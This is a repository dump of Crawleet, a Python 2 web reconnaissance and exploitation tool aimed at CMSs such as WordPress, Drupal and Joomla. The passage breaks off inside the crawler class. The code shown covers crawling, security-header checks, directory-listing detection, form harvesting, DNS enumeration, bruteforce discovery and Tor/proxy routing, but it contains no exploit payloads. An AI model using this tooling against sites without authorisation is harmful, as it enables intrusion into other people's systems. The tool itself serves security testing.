├── README.md
├── analysis
    ├── __init__.py
    ├── __init__.pyc
    ├── headers.py
    └── headers.pyc
├── config
    ├── ConfigParser.py
    ├── ConfigParser.pyc
    ├── __init__.py
    └── __init__.pyc
├── crawleet.py
├── crawler
    ├── ClassyCrawler.py
    ├── ClassyCrawler.pyc
    ├── __init__.py
    └── __init__.pyc
├── data
    ├── bruteforce_list.txt
    ├── data.xml
    ├── extensions_blacklist.txt
    ├── mime_types.txt
    └── scanningtools.xml
├── detection
    ├── __init__.py
    ├── __init__.pyc
    ├── dnsenum.py
    ├── dnsenum.pyc
    ├── notas
    ├── swcontroller.py
    ├── swcontroller.pyc
    ├── swdetection.py
    ├── swdetection.pyc
    ├── vulncontroller.py
    ├── vulncontroller.pyc
    ├── vulndetection.py
    └── vulndetection.pyc
├── docs
    ├── diagrama.uxf
    ├── notas
    └── report.png
├── linuxinstaller.sh
├── reports
    ├── .base.css.swp
    ├── __init__.py
    ├── __init__.pyc
    ├── base.css
    ├── jquery-1.8.3.min.js
    ├── jquery.elevatezoom.js
    ├── reporthtml.py
    ├── reporthtml.pyc
    ├── reportmgr.py
    ├── reportmgr.pyc
    ├── reporttxt.py
    ├── reporttxt.pyc
    ├── reportxml.py
    └── reportxml.pyc
├── request
    ├── __init__.py
    ├── __init__.pyc
    ├── rutils.py
    └── rutils.pyc
├── results
    ├── Formulario.py
    ├── Formulario.pyc
    ├── __init__.py
    ├── __init__.pyc
    ├── nodoresultado.py
    ├── nodoresultado.pyc
    ├── simplenode.py
    └── simplenode.pyc
├── sitemap
    ├── .mapper.py.swp
    ├── __init__.py
    ├── __init__.pyc
    ├── mapobj.py
    ├── mapobj.pyc
    ├── site_mapper.py
    └── site_mapper.pyc
└── utils
    ├── __init__.py
    ├── __init__.pyc
    ├── bruteforcer.py
    ├── bruteforcer.pyc
    ├── parseurls.py
    ├── parseurls.pyc
    ├── ubanner.py
    └── ubanner.pyc


/README.md:
--------------------------------------------------------------------------------
  1 | ```
  2 |           ``                                                              
  3 |      `:    .//-.   -:-`                                                   
  4 |    `  -s`   `odo-`  .y+.                                                  
  5 |    /   od+`   .dmy+.  omo-                                                
  6 |    +:  `hNy.   -sMNs-``/Nd+.        ▄▄· ▄▄▌   ▄▄▄· ▄▄▌ ▐ ▄▌▄▄▌  ▄▄▄ .▄▄▄  
  7 |    .d/` .hMd/-` .yMMm/``-yMh.      ▐█ ▌▪██•  ▐█ ▀█ ██· █▌▐███•  ▀▄.▀·▀▄ █·
  8 |    `oN+  -NMh:. .-NMMy. `-mMm:`    ██ ▄▄██▪  ▄█▀▀█ ██▪▐█▐▐▌██▪  ▐▀▀▪▄▐▀▀▄ 
  9 |     -MN. `/mMm+. .ohNNs. `.sMN/`   ▐███▌▐█▌▐▌▐█ ▪▐▌▐█▌██▐█▌▐█▌▐▌▐█▄▄▌▐█•█▌
 10 |     -dMo` `yNMm:`  `-hM+.  `sNh.   ·▀▀▀ .▀▀▀  ▀  ▀  ▀▀▀▀ ▀▪.▀▀▀  ▀▀▀ .▀  ▀
 11 |     `.dM/  `-dMh-`   -Nm/.   :d+                                          
 12 |      -mMd:`  :mN+`    -sy`    `:                                          
 13 |       +dMs`   .ss`      /.      `  		by truerandom
 14 |        .mN:    .o-       `         
 15 |         .+s      -`                
 16 |           .:                       
 17 |                                    
 18 | ```
 19 | 
 20 | # Crawleet
 21 | Web Recon & Exploitaition Tool.  
 22 | It detects and exploit flaws in:
 23 | * Drupal
 24 | * Joomla
 25 | * Magento
 26 | * Moodle
 27 | * OJS
 28 | * Struts
 29 | * Wordpress 
 30 | 
 31 | And enumerates themes, plugins and sensitive files\
 32 | Also detects:
 33 | * Crypto mining scripts
 34 | * Malware
 35 | 
 36 | The tool is extensible using xml files.
 37 | 
 38 | ## Installation
 39 | 1. Use `linuxinstaller.sh`
 40 | 2. Or use pip to install the following libraries:
 41 | 	* requests
 42 | 	* anytree
 43 | 	* lxml
 44 | ## Usage
 45 | * `python crawleet.py -u <starting url>`
 46 | * `python crawleet.py -l <file with sites>`
 47 | 
 48 | ## Report
 49 | It generates reports in the following formats
 50 | * html
 51 | * txt
 52 | * xml
 53 | 	
 54 | ## All Options
 55 | ```
 56 | Options:
 57 |   -h, --help            show this help message and exit
 58 |   -a USERAGENT,		--user-agent=USERAGENT
 59 |                         Set User agent
 60 |   -b, --brute           Enable Bruteforcing for resource discovery
 61 |   -c CFGFILE,		--cfg=CFGFILE
 62 |                         External tools config file
 63 |   -d DEPTH,		--depth=DEPTH
 64 |                         Crawling depth
 65 |   -e EXCLUDE,		--exclude=EXCLUDE
 66 |                         Resources to exclude (comma delimiter)
 67 |   -f,			--redirects       
 68 | 			Follow Redirects
 69 |   -g STARTLINKS, --startlinks=STARTLINKS
 70 |                         Add additional start links to crawl
 71 |   -i TIME,		--time=TIME
 72 | 			Delay between requests 
 73 |   -k COOKIES,		--cookies=COOKIES
 74 |                         Set cookies
 75 |   -l SITELIST,		--site-list=SITELIST
 76 |                         File with sites to scan (one per line)
 77 |   -m,			--color
 78 | 			Colored output
 79 |   -n TIMEOUT,		--timeout=TIMEOUT
 80 |                         Timeout for request
 81 |   -o OUTPUT,		--output=OUTPUT
 82 |                         Output formats txt,html
 83 |   -p PROXY, 		--proxy=PROXY
 84 |                         Set Proxies "http://ip:port;https://ip:port"
 85 |   -r, 			--runtools
 86 | 			Run external tools
 87 |   -s, 			--skip-cert
 88 | 			Skip Cert verifications
 89 |   -t,			--tor
 90 | 			Use tor
 91 |   -u URL,		--url=URL
 92 | 			Url to analyze
 93 |   -v,			--verbose
 94 | 			Verbose mode
 95 |   -w WORDLIST, 		--wordlist=WORDLIST
 96 |                         Bruteforce wordlist
 97 |   -x EXTENSIONS,	--exts=EXTENSIONS
 98 |                         Extensions to use for bruteforce
 99 |   -y, 			--backups
100 | 			Search for backup files
101 |   -z MAXFILES,		--maxfiles=MAXFILES
102 |                         Max files in the site to analyze
103 |   --datadir=DATADIR	data directory
104 |   --save                Save the start page source code
105 |   --threads=THREADS     Number of threads to use
106 | ```
107 | 


--------------------------------------------------------------------------------
/analysis/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/analysis/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/analysis/__init__.pyc


--------------------------------------------------------------------------------
/analysis/headers.py:
--------------------------------------------------------------------------------
 1 | # Returns if options is enabled
 2 | def getHeaders(req,host):
 3 | 	try:
 4 | 		return req.getHTMLCode(host).headers
 5 | 	except Exception as e:
 6 | 		return None
 7 | 
 8 | # Returns headers with sensitive info
 9 | def getInfoHeaders(req,host):
10 | 	try:
11 | 		hs = ['last-modified','server', 'via', 'x-powered-by', 'x-country-code','e-tag'
12 | 		'authorization','www-authenticate','proxy-authenticate','proxy-authorization',
13 | 		'accept','x-jal','x-jsl','cookie','x-aspnet-version','x-accel-version',
14 | 		'x-whom','x-cache','x-generator','x-forwarded-for','x-forwarded-by',
15 | 		'x-drupal-cache','cf-ray','x-varnish']
16 | 		foundheadersorig = getHeaders(req,host)
17 | 		foundheaders = {}
18 | 		for key, value in foundheadersorig.iteritems():
19 | 			foundheaders[key.lower()] = value
20 | 		headers = ['************ Info Headers **************']
21 | 		if foundheaders is not None:
22 | 			for header in hs:
23 | 				# if header in busca
24 | 				if header in foundheaders.keys():
25 | 					#print 'header %s value %s ' % (header,foundheaders[header])
26 | 					headers.append('%s: %s' % (header,foundheaders[header]))
27 | 		return headers
28 | 	except Exception as e:
29 | 		return []
30 | 
31 | '''
32 | Busca una serie de headers definidos en una lista y regresa una lista
33 | con el valor para los que estan y reporta si no estan
34 | '''
35 | def secureHeaders(req,host):
36 | 	try:
37 | 		hs = ['x-content-type-options','x-frame-options',
38 | 		'strict-transport-security',
39 | 		'x-xxs-protection','content-security-policy','public-key-pins']
40 | 		foundheadersorig = getHeaders(req,host)
41 | 		foundheaders = {}
42 | 		for key, value in foundheadersorig.iteritems():
43 | 			foundheaders[key.lower()] = value
44 | 		headers = ['************Secure Headers**************']
45 | 		notfoundheaders=['*********Missing Secure Headers*********']
46 | 		if foundheaders is not None:
47 | 			for header in hs:
48 | 				if header in foundheaders.keys():
49 | 					headers.append('%s: %s' % (header,foundheaders[header]))
50 | 				else:
51 | 					notfoundheaders.append('%s not found'%header)
52 | 		res = []
53 | 		if len(headers)>1: res = res+headers
54 | 		if len(notfoundheaders) > 1: res = res+notfoundheaders
55 | 		return res
56 | 	except Exception as e:
57 | 		return []
58 | 
59 | 
60 | def headersAnalysis(req,host):
61 | 	return getInfoHeaders(req,host)+secureHeaders(req,host)
62 | 
63 | 


--------------------------------------------------------------------------------
/analysis/headers.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/analysis/headers.pyc


--------------------------------------------------------------------------------
/config/ConfigParser.py:
--------------------------------------------------------------------------------
 1 | from xml.dom.minidom import parse
 2 | class ConfigParser:
 3 | 	def __init__(self,fname):
 4 | 		# diccionario:= 'nombresw':pathescaner
 5 | 		self.toolspath = {}
 6 | 		# diccionario:= 'nombresw':[toolarg1,toolarg2...]
 7 | 		self.toolargs = {}
 8 | 		self.filename = fname
 9 | 		self.toolflags = {}
10 | 		self.getToolsPath()
11 | 		self.getToolsArgs()
12 | 		self.getToolsFlags()
13 | 		
14 | 	# Regresa un diccionario  donde ('scannerdecms','path')
15 | 	# ie := 'wordpress','../wpscan'
16 | 	# Asi SWDetector puede preguntar en tiempo constante que herramientas tiene
17 | 	def getToolsPath(self):
18 | 		dom = parse(self.filename)
19 | 		# diccionario para las herramientas
20 | 		tools = {}
21 | 		xmltools=dom.getElementsByTagName('tool')
22 | 		for node in xmltools:
23 | 			tool_name=node.getAttribute('name')
24 | 			pathlist=node.getElementsByTagName('path')
25 | 			for p in pathlist: path = p.firstChild.data
26 | 			if path is not None:
27 | 				tools[tool_name] = path
28 | 		print('Debug: getToolsPath')
29 | 		print(tools)
30 | 		self.toolspath = tools
31 | 		
32 | 	# Construye un diccionario con entradas 'software':[arg1,arg2,...]
33 | 	def getToolsArgs(self):
34 | 		dom = parse(self.filename)
35 | 		# diccionario para las herramientas
36 | 		toolargs = {}
37 | 		args = []
38 | 		xmltools=dom.getElementsByTagName('tool')
39 | 		for node in xmltools:
40 | 			tool_name=node.getAttribute('name')
41 | 			pathlist=node.getElementsByTagName('targ')
42 | 			for p in pathlist: 
43 | 				args.append(p.firstChild.data)
44 | 			toolargs[tool_name] = args
45 | 			args = []
46 | 		self.toolargs = toolargs
47 | 		print('Debug: getToolsArgs')
48 | 		print(toolargs)
49 | 		return self.toolargs
50 | 
51 | 	
52 | 	# regresa un diccionario donde la llave es el nombre de la herramienta
53 | 	# y el valor es una lista de tuplas donde la tupla es (marcador,score)
54 | 	def getToolsFlags(self):
55 | 		dom = parse(self.filename)
56 | 		toolflags = {}
57 | 		args = []
58 | 		xmltools=dom.getElementsByTagName('tool')
59 | 		for node in xmltools:
60 | 			tool_name=node.getAttribute('name')
61 | 			toolflags[tool_name] = []
62 | 			pathlist=node.getElementsByTagName('tflag')
63 | 			for p in pathlist: 
64 | 				tup = (str(p.firstChild.data),int(p.getAttribute('score')))
65 | 				toolflags[tool_name].append(tup)
66 | 		self.toolflags = toolflags
67 | 		print('Debug: getToolsFlags')
68 | 		print(toolflags)
69 | 
70 | 	# Recibe el software (cms)  y regresa la cadena de comandos 
71 | 	# la herramienta debe sustituir su url
72 | 	def getToolArg(self,sw):
73 | 		if sw in self.toolspath:
74 | 			tpath = self.toolspath[sw]
75 | 			args = [tpath]
76 | 			args.extend(self.toolargs[sw])
77 | 			return args
78 | 		else:
79 | 			return None
80 | 
81 | 	# Returns the scanner path for passed cms
82 | 	def getPath(self,cms):
83 | 		try:
84 | 			return self.toolspath[cms.lower()]
85 | 		except:
86 | 			return None		
87 | 	
88 | 	# regresa una lista de tuplas para las banderas de la herramienta externa
89 | 	#donde elem:=(marker,score)
90 | 	def getToolFlags(self,sw):
91 | 		if sw in self.toolflags:
92 | 			tflags = self.toolflags[sw]
93 | 			return tflags
94 | 		else:
95 | 			return None
96 | 


--------------------------------------------------------------------------------
/config/ConfigParser.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/config/ConfigParser.pyc


--------------------------------------------------------------------------------
/config/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/config/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/config/__init__.pyc


--------------------------------------------------------------------------------
/crawleet.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | from multiprocessing.dummy import Pool as ThreadPool
  3 | from optparse import OptionParser
  4 | from detection.dnsenum import *
  5 | from analysis import headers
  6 | from crawler.ClassyCrawler import *
  7 | from reports.reporthtml  import *		# reportes
  8 | from reports.reporttxt  import *		# reportes
  9 | from reports.reportmgr import *
 10 | from utils import ubanner			# banner
 11 | from request.rutils import * 	# Objeto para peticiones 
 12 | from utils import parseurls
 13 | from utils.bruteforcer import *	# nuevo
 14 | from time import gmtime, strftime
 15 | 
 16 | try: from colorama import init, Fore,Back, Style
 17 | except:pass
 18 | 
 19 | class argsparser:
 20 | 	def __init__(self):
 21 | 		self.parser = self.getParser()
 22 | 		try:
 23 | 			init(convert=True,autoreset=True) # colorama
 24 | 		except: pass
 25 | 
 26 | 	def getParser(self):
 27 | 		parser = OptionParser()
 28 | 		parser.add_option("-a", "--user-agent",dest="useragent",default=None,help="Set User agent")
 29 | 		parser.add_option("-b", "--brute", dest="bruteforce", default=False,action="store_true",help="Enable Bruteforce for resources")
 30 | 		parser.add_option("-c", "--cfg", dest="cfgfile", default='%s/data/scanningtools.xml'%(sys.path[0]),help="Tool cfg file")
 31 | 		parser.add_option('-d', "--depth",dest="depth",default=2,help="Crawling depth")
 32 | 		parser.add_option("-e", "--exclude", dest="exclude", default='',help="Resource to exclude (comma delimiter)")
 33 | 		parser.add_option("-f", "--redirects",dest="redirects",default=False,action="store_true",help="Follow Redirects")
 34 | 		parser.add_option("-g", "--startlinks",dest="startlinks",default=[],help="Add additional start links to crawl")
 35 | 		parser.add_option('-i', "--time",dest="time",default=0.2,help="Interval period between requests")		
 36 | 		parser.add_option("-k", "--cookies", dest="cookies", default=None,help="Cookies for navigation")
 37 | 		parser.add_option("-l", "--site-list", dest="sitelist", default=None,help="File with sites to scan (one per line)")
 38 | 		parser.add_option("-m", "--color",dest="color",default=False,action="store_true",help="Colored output")
 39 | 		parser.add_option("-n", "--timeout",dest="timeout",default=3,help="Timeout for request")
 40 | 		parser.add_option("-o", "--output", dest="output", default='txt,html,xml',help="Output formats txt,html ")
 41 | 		parser.add_option("-p", "--proxy",dest="proxy",default=None,help="Set Proxies \"http://ip:port;https://ip:port\"")
 42 | 		parser.add_option("-r", "--runtools", dest="runexternaltools", default=False,action="store_true",help="Run external tools")
 43 | 		parser.add_option("-s", "--skip-cert", dest="skipcerts", default=False, action="store_true",help="Skip Cert verifications")
 44 | 		parser.add_option("-t", "--tor",dest="tor",default=False,action="store_true",help="Use tor")
 45 | 		parser.add_option('-u', "--url",dest="url",default=None,help="Url to analyze")
 46 | 		parser.add_option("-v", "--verbose", dest="verbose", default=False, action="store_true", help="Verbose mode")
 47 | 		parser.add_option("-w", "--wordlist", dest="wordlist", default="%s/data/wordlist.txt"%(sys.path[0]), help="Wordlist to bruteforce")
 48 | 		parser.add_option("-x", "--exts", dest="extensions",default='',help = "Extensions for bruteforce")
 49 | 		parser.add_option("-y", "--backups", dest="backups",default=False,action="store_true",help = "Search for backup files")
 50 | 		parser.add_option("-z", "--maxfiles", dest="maxfiles",default=1000,help = "Max files in the site to analyze")
 51 | 		parser.add_option("--blacklist", dest="blacklistdir", default='%s/data/extensions_blacklist.txt'%(sys.path[0]),help="data directory ")
 52 | 		parser.add_option("--datadir", dest="datadir", default='%s/data/data.xml'%(sys.path[0]),help="data directory ")
 53 | 		parser.add_option("--save",dest="save",default=False,action="store_true",help = "Save the start page source code")
 54 | 		parser.add_option("--threads",dest="threads",default=1,help = "Number of threads to use")
 55 | 		return parser 
 56 | 
 57 | 	def checkOptions(self,opts):
 58 | 		#if opts.url is None:
 59 | 		if opts.url is None and opts.sitelist is None:
 60 | 			print "--url or --site-list is required "
 61 | 			print "use -h to show help"
 62 | 			exit()
 63 | 		
 64 | 		if opts.url is not None and opts.sitelist is not None:
 65 | 			print 'only one option --url or site-list allowed'
 66 | 			exit()
 67 | 		
 68 | 		if opts.url is not None:
 69 | 			if 'http' not in opts.url:
 70 | 				print "Please indicate the protocol (http|https)"
 71 | 				print "use -h to show help"
 72 | 				exit()
 73 | 			else:
 74 | 				opts.sites = opts.url.split(',') 
 75 | 		
 76 | 		if opts.sitelist is not None:
 77 | 			try:
 78 | 				with open(opts.sitelist) as f:
 79 | 					opts.sites = f.read().splitlines()
 80 | 			except Exception as e :
 81 | 				print 'Cant open sites file ',e
 82 | 				exit()
 83 | 				
 84 | 		if opts.extensions is not None:
 85 | 			opts.extensions = opts.extensions.split(',')
 86 | 			
 87 | 		if len(opts.startlinks) > 0:
 88 | 			opts.startlinks = opts.startlinks.split(',')
 89 | 		
 90 | 		if opts.threads is not None:
 91 | 			try:
 92 | 				nt = int(opts.threads)
 93 | 				opts.threads = nt
 94 | 			except Exception as e :
 95 | 				opts.threads = 1
 96 | 				
 97 | 		try:
 98 | 			opts.time = float(opts.time)
 99 | 			opts.timeout = float(opts.timeout)
100 | 			opts.depth = int(opts.depth)
101 | 			opts.maxfiles = int(opts.maxfiles)
102 | 			if opts.exclude == '':
103 | 				opts.exclude = []
104 | 			else:
105 | 				opts.exclude = opts.exclude.split(',')
106 | 		except Exception as e:
107 | 			print e
108 | 
109 | # Chanfle: hacer la clase url utils
110 | def getDomain(direccion): return direccion.split("//")[-1].split("/")[0].replace('www.','')
111 | print ubanner.getBanner()
112 | 
113 | def scan(site):
114 | 	try:
115 | 		req = rutils(not opts.skipcerts,opts.redirects,opts.cookies,opts.useragent,opts.tor,opts.timeout,opts.proxy)
116 | 		# Obtenemos el domain
117 | 		domain = getDomain(site)
118 | 		#################### Reporte #######################
119 | 		reportex = reportmgr(domain,domain,opts.output)
120 | 		
121 | 		#################### Parametros de ejecucion #################
122 | 		ejecucion=[	
123 | 					'Scan date: '+strftime("%Y-%m-%d", gmtime()),
124 | 					'Startpage: '+site,
125 | 					'Site IP: '+req.getSiteIP(site),
126 | 					'Depth: '+str(opts.depth),
127 | 					'Delay: '+str(opts.time),
128 | 					'MaxFiles: '+str(opts.maxfiles),
129 | 					'Run External Tools: '+str(opts.runexternaltools),
130 | 					'Excluded dirs: '+','.join(opts.exclude),
131 | 					'Start links: '+','.join(opts.startlinks),
132 | 					'Bruteforce: '+str(opts.bruteforce),
133 | 					'Wordlist: '+str(opts.wordlist),
134 | 					#
135 | 					'Blacklist: '+str(opts.blacklistdir),
136 | 					'Bruteforce extensions: '+','.join(opts.extensions),
137 | 					'Config file: '+str(opts.cfgfile),
138 | 					'Allow Redirects: '+str(req.redirects()),
139 | 					'Verify Certs: '+str(req.verifyCert()),
140 | 					'Cookies: '+cgi.escape(str(req.cookies())),
141 | 					'Useragent: '+str(req.userAgent()),
142 | 					'Tor: '+str(req.useTor()),
143 | 					'Proxies:'+str(req.getProxys()),
144 | 					'Timeout: '+str(req.getTimeout()),
145 | 					'IP used: '+str(req.getIP()).rstrip()
146 | 		]
147 | 		
148 | 		if opts.save:
149 | 			print 'Saving startpage'
150 | 			req.savePage(site)
151 | 			
152 | 		# ejecucion
153 | 		if opts.color:
154 | 			try: print (Fore.BLUE+"Execution\n"+Style.RESET_ALL+'\n'.join(ejecucion))
155 | 			except: print '\nExecution','\n'.join(ejecucion)
156 | 		else:
157 | 			print '\nExecution','\n'.join(ejecucion)
158 | 		reportex.fromList(['execution']+["Crawleet by truerandom"]+ejecucion,False,True)
159 | 
160 | 		# Headers
161 | 		headersinfo=headers.headersAnalysis(req,parseurls.getDomain(site))
162 | 		if opts.color:
163 | 			try: print (Fore.BLUE+"\nHeaders\n"+Style.RESET_ALL+'\n'.join(headersinfo))
164 | 			except: print '\nHeaders','\n'.join(headersinfo)
165 | 		else:
166 | 			print '\nHeaders','\n'.join(headersinfo)
167 | 		reportex.fromList(['headers']+headersinfo)
168 | 
169 | 		# Metodos http 
170 | 		metodos = req.getMethods(parseurls.getDomain(site)).keys()
171 | 		if opts.color:
172 | 			try: print (Fore.BLUE+"\nHTTP methods\n"+Style.RESET_ALL+'\n'.join(metodos))
173 | 			except: print '\nHTTP methods','\n'.join(metodos)
174 | 		else:
175 | 			print '\nHTTP methods','\n'.join(metodos)
176 | 		reportex.fromList(['http methods']+metodos)
177 | 
178 | 		# Crawling : Include blacklist opts.blacklistdir
179 | 		crawly = ClassyCrawler(req,reportex,site,opts.depth,opts.time,
180 | 			opts.bruteforce,opts.backups,opts.wordlist,opts.runexternaltools,
181 | 			opts.cfgfile,opts.datadir,opts.blacklistdir,opts.extensions,opts.verbose,
182 | 			opts.exclude,opts.maxfiles,opts.color)
183 | 		
184 | 		# Si se proporcionaron links adicionales para hacer el crawling
185 | 		crawly.setStartLinks(opts.startlinks)
186 | 		
187 | 		# crawling
188 | 		crawly.crawl()
189 | 		print('pase crawl')
190 | 		#print('pase crawl')
191 | 		# Registros DNS 
192 | 		dnsmod= dnsenum()
193 | 		subdominios = dnsmod.getResults(getDomain(site),opts.timeout)
194 | 		#print('pase subdominios')
195 | 		if opts.color:
196 | 			try: print (Fore.BLUE+'\n'+'\n'.join(subdominios)+Style.RESET_ALL)
197 | 			except: print '\nSubdominios\n','\n'.join(subdominios)
198 | 		else:
199 | 			print '\nSubdominios\n','\n'.join(subdominios)
200 | 		reportex.fromList(subdominios)
201 | 
202 | 		# Terminamos el reporte
203 | 		reportex.finish()
204 | 	except Exception as e:
205 | 		print('problem with %s' % site)
206 | 		print(e)
207 | 		
208 | ##################### PARAMETROS ########################
209 | argp = argsparser()
210 | opts, args = argp.parser.parse_args()
211 | argp.checkOptions(opts)
212 | 
213 | # Iteracion de sitios aki van los hilos
214 | print 'Number of sites to scan: %s' % len(opts.sites)
215 | try:
216 | 	pool = ThreadPool(opts.threads)
217 | 	scans = pool.map(scan,opts.sites)
218 | 	pool.close()
219 | 	pool.join()
220 | except Exception as e:
221 | 	print e
222 | 


--------------------------------------------------------------------------------
/crawler/ClassyCrawler.py:
--------------------------------------------------------------------------------
  1 | import sys
  2 | import requests
  3 | import lxml.html
  4 | import re
  5 | import time
  6 | import collections
  7 | from anytree import *
  8 | import posixpath 
  9 | import cgi
 10 | from urlparse import urlparse
 11 | # clase para reportes
 12 | from reports.reporthtml  import *
 13 | from results.nodoresultado import *
 14 | from results.Formulario import *
 15 | from detection.swcontroller import *
 16 | from detection.swdetection import *
 17 | from detection.vulncontroller import *
 18 | from detection.vulndetection import *
 19 | from sitemap import site_mapper
 20 | from utils import parseurls
 21 | from utils import ubanner
 22 | from utils.bruteforcer import *	# chanfle
 23 | # test
 24 | from urlparse import urlparse
 25 | try:
 26 | 	from colorama import init, Fore,Back, Style
 27 | except:
 28 | 	pass
 29 | class ClassyCrawler:
 30 | 	def __init__(self,req,reportex,url,depth,delay,bruteforce,backups,wordlist,runexternaltools,cfgfile,datadir,blacklistdir,extensions,verbose,exclude,maxfiles=1000,color=False):
 31 | 		self.banner = ubanner.getBanner()
 32 | 		self.reportex = reportex			# modulo de reportes	
 33 | 		self.url = url						# url
 34 | 		self.color = color
 35 | 		self.domain = self.getDomain(self.url)
 36 | 		self.req = req						# objeto para realizar las peticiones
 37 | 		self.depth = depth					# depth
 38 | 		self.delay = delay					# delay between requests
 39 | 		self.maxfiles = maxfiles			# maximum files to analize
 40 | 		self.wordlist = wordlist			# wordlist to bruteforce
 41 | 		self.exclude = exclude				# excluir archivos o directorios
 42 | 		self.startlinks = []
 43 | 		self.tovisit = collections.OrderedDict()
 44 | 		self.visited = collections.OrderedDict()
 45 | 		self.extlinks = []					# link externos del aplicativo
 46 | 		self.flist = []						# links con archivos del aplicativo
 47 | 		self.brokenlist = []				# links con archivos 404 o 500 del aplicativo
 48 | 		self.visitedresources = []			# visited resources (objetos)
 49 | 		self.cfgfile = cfgfile				# directorio de el archivo de cfg para exttool
 50 | 		self.datadir = datadir				# directorio de data para las detecciones
 51 | 		self.blacklistdir = blacklistdir    # exts blacklist
 52 | 		self.runexternaltools = runexternaltools	# ejecutar herramientas externas
 53 | 		# detector de vulnerabilidades
 54 | 		# TODO: include blacklist
 55 | 		self.vulndetector = vulncontroller(cfgfile,self.blacklistdir,req,self.color)
 56 | 		# detector de software , archivos de configuracion de herramientas externas
 57 | 		self.swdetector = swcontroller(cfgfile,self.datadir,req,self.vulndetector,self.color)		
 58 | 		print(self.swdetector)
 59 | 		#################### BRUTEFORCER ##########################
 60 | 		self.bruteforce = bruteforce	# variable para decidir si hacer bruteforce
 61 | 		self.bforcer = bruteforcer(req,extensions,delay,verbose,wordlist)
 62 | 		self.backups = backups	#search for currentfile backups
 63 | 		self.directories = []
 64 | 		self.interestingfiles = []
 65 | 		self.puntuacion = 0
 66 | 		self.verbose = verbose
 67 | 		# formularios tab
 68 | 		self.forms = []
 69 | 		# cadena para el sitemap
 70 | 		self.sitemap = ''
 71 | 		
 72 | 	# regresa la prioridad para este sitio:
 73 | 	# se calcula usando
 74 | 	# el numero de recursos visitados, archivos encontrados
 75 | 	# y puntuacion regresada por los modulos de deteccion
 76 | 	def getPriority(self):
 77 | 		# defcore -> 100 
 78 | 		# puntuacion = x%
 79 | 		defscore = len(self.visitedresources)+len(self.flist)
 80 | 		if defscore == 0: defscore = 1
 81 | 		tscore = self.puntuacion / defscore
 82 | 		# si tscore < 30: low : tscore< 80 : medium < tscore > high
 83 | 		return tscore
 84 | 		
 85 | 	# define la base (subdominio) para hacer el crawl
 86 | 	def getDomain(self,direccion):
 87 | 		#return direccion.split("//")[-1].split("/")[0].replace('www.','')
 88 | 		parsed_uri = urlparse(direccion)
 89 | 		result = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)
 90 | 		return result.replace('https://','').replace('http://','').replace('www.','')
 91 | 	
 92 | 	def fixUrl(self,url):
 93 | 		try:
 94 | 			if url is not None:				
 95 | 				parsed = urlparse(url)
 96 | 				new_path = posixpath.normpath(parsed.path)
 97 | 				cleaned = parsed._replace(path=new_path)
 98 | 				cleanurl = cleaned.geturl()
 99 | 				if url[-1] == '/':
100 | 					cleanurl+='/'
101 | 				"""
102 | 				if self.verbose:
103 | 					# print 'Entre a fixUrl con %s ' % url
104 | 					#print 'Parsed %s ' % parsed
105 | 					# print 'Cleaned %s ' % cleanurl
106 | 				"""
107 | 				return cleanurl
108 | 		except Exception as e:
109 | 			print "FixUrl Something wrong with %s "%url
110 | 			print e
111 | 			return None
112 |     		
113 | 	# tupla que regresa:
114 | 	#	None si no es un archivo html
115 | 	#	(ishtml,code) 
116 | 	def isHTML(self,frequest):
117 | 		try:
118 | 			if frequest is not None:
119 | 				if 'html' in frequest.headers['content-type']:
120 | 					return (True,frequest.status_code)
121 | 				return (False,frequest.status_code)
122 | 			return None
123 | 		except:
124 | 			return None
125 | 
126 | 	def getForms(self,code):
127 | 		try:
128 | 			pagesource = code
129 | 			# treeparser = 
130 | 			tree = lxml.html.fromstring(pagesource)
131 | 			formlist = []
132 | 			# Obtengo los formularios
133 | 			formularios = tree.xpath('.//form')
134 | 			for form in formularios:
135 | 				actform = Formulario('',form.action,form.method,[])
136 | 				actform.setAction(form.action)
137 | 				actform.setMethod(form.method)
138 | 				campos = []
139 | 				for f in form.inputs.keys():
140 | 					campos.append(form.inputs[f])
141 | 				actform.setControls(campos)
142 | 				formlist.append(actform)
143 | 				print(actform)
144 | 				print(actform.xml())
145 | 			self.puntuacion = self.puntuacion+(len(formlist)*5)
146 | 			return formlist
147 | 		except Exception as e:
148 | 			print "something wrong"
149 | 			print e
150 | 			return []
151 | 		
152 | 	# param: link
153 | 	# returns: si el link pasado es absoluto
154 | 	def isAbsolute(self,link):
155 | 		link = link.strip()
156 | 		linkpattern = '([A-Za-z0-9])+://'
157 | 		return re.match(linkpattern,link)
158 | 
159 | 	# Regresa el prefijo del recurso ie url de url/recurso
160 | 	def getPreffix(self,baseurl):
161 | 		return baseurl.rsplit('/',1)[0]+'/'
162 | 
163 | 	# Tomo la url actual, url .../recurso quito el recuro y hago la peticion
164 | 	# Tengo que identificar si hay listado de directorios, si es asi regreso True
165 | 	def directoryListing(self,url):
166 | 		dlistingstrings = ["<title>Index of","\[To Parent Directory\]"]
167 | 		url = self.getPreffix(url)
168 | 		if self.domain in self.getDomain(url):
169 | 			try:
170 | 				htmlcode = self.req.getHTMLCode(url)
171 | 			except Exception as e:
172 | 				print "Error@Crawler:directoryListing "+e
173 | 				htmlcode = None
174 | 			if htmlcode is not None and htmlcode.status_code < 300: 
175 | 				for dliststring in dlistingstrings:
176 | 					if len(re.findall(dliststring,htmlcode.text,re.IGNORECASE)) > 0:
177 | 						return True
178 | 			else:
179 | 				return False
180 | 		return False
181 | 
182 | 	# bruteforce: recibe una url .../recurso quita el recurso y hace bruteforce
183 | 	def bruteForce(self,baseurl):
184 | 		try:
185 | 			filesfound = self.bforcer.directory(baseurl)
186 | 			return filesfound
187 | 		except Exception as e:
188 | 			print "Error in bruteforce -> ",e
189 | 			return None
190 | 			
191 | 	# Utilizar parseurl o test para arreglar esto
